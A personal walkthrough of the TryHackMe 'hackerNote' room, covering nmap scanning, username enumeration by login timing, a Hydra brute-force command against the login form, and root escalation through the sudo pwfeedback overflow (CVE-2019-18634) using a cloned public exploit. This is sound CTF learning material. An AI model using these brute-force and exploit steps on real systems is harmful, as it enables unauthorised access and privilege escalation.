I thought it was time to do some more learning, so I have decided to focus on some of the more specific tutorial machines on TryHackMe. This one got my attention, probably due to the title:-).
Anyway, let's start off with the standard port scan using Nmap with service version flag enabled and see what is open and start leaning some things about this machine.
To start with I am will add the IP to the /etc/hosts file, simply because I can never remember the IP address, whereas ‘hackernotes.thm’ is much easier.
nmap -sV -sC -oN version-scan hackernotes.thm
So let’s take a look at the results. We have ssh running on port 22, something called a Golang http server running on port 80/8080 and the operating system appears to be Ubuntu. All I know is that Goland is a programing language called ‘Go’.
There is nothing we can do at this stage with ssh on port 22, simply because we do not have any credentials, so let’s focus on the web server ports starting with port 80.
Port 80 — Golang net/http server:
So we have a webpage, “Welcome to hackerNote’, there is nothing hidden in the source code, but there is a login. First thing with any website enumeration is explore the site and fully understand it. So, let’ try and login. So I tried some common credentials like admin:admin, but nothing worked, so let’s create an account.
We have successfully created an account, so let’s login:
OK, so enough enumeration, we can just follow the tutorial. The basis of the timing attack is to look for a time difference between valid usernames and non-valid username. I used the python script available from the link and downloaded the j_names.txt file to start with. Changing the IP and copying the j_names.txt file to the same directory as I am running the Python file from we get:
So we have a username ‘james’, let’s move on to the next part of the tutorial.
In the next part we have to download the wordlist.zip file and extract the colors.txt and numbers.txt and use these with the combinator.bin file to combine the two files into a wordlist we can use with Hydra.
cominator.bin color.txt numbers.txt > wordlist.txtWe can now use the wordlist with hydra to crack the password for the user and log into the website.
hydra -l james -P wordlist.txt 10.10.106.26 http-post-form "/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password"
We find the password and can now log into the website as the cracked user:
SSH Port 20:
With the new credentials, we can now log into the ssh server:
ssh james@10.10.106.26
From here we need to grab the user.txt and try to privesc to root. The first thing I always check is to see whether the user has any root privileges using the ‘sudo -l’ command.
The first thing we notice here is the ‘******’ characters when we enter the password. From a previous CTF I remember that this is a potential sign for a sudo exploit covered under CVE-2019–18634 which affects sudo versions prior to 1.8.26. For this exploit to work ‘pwfeedback’ has been enabled and this we can see by the ‘*******’ when we enter the password. So let’s check the sudo version:
We can see that the sudo version is 1.8.21 and we know that pwfeedback is enabled, so this version is subject to the vulnerability which can cause a buffer overflow resulting in root.
We can download the exploit from below:
git clone https://github.com/saleemrashid/sudo-cve-2019-18634.gitTo compile the exploit navigate to the directory and run the command ‘make’, you should now have a binary called ‘exploit’
start an ssh server on your machine so that we can use scp to transfer the file from our attack machine from the remote.
sudo systemctl start sshIf you do not have ssh installed on your machine, you can download it using the following:
sudo apt-get install openssh-serverThere is a good tutorial at the link below:
From the remote machine copy the file into the /home/james directory where we have full write priveledge:
scp garth@10.9.6.68:/home/garth/hacking/tryhackme/hackernote/exploit exploit
To run the exploit simply enter:
./exploit
From here we can navigate to the /root directory and get the root.flag:
And there we have. Although I was familiar with the Sudo exploit, I found the timing vulnerability interesting. One thing is for sure, I really need to spend more time learning Python. So I took the decision and enrolled in the following Udemy course. All I need now are more hours in the day and possibly the night.
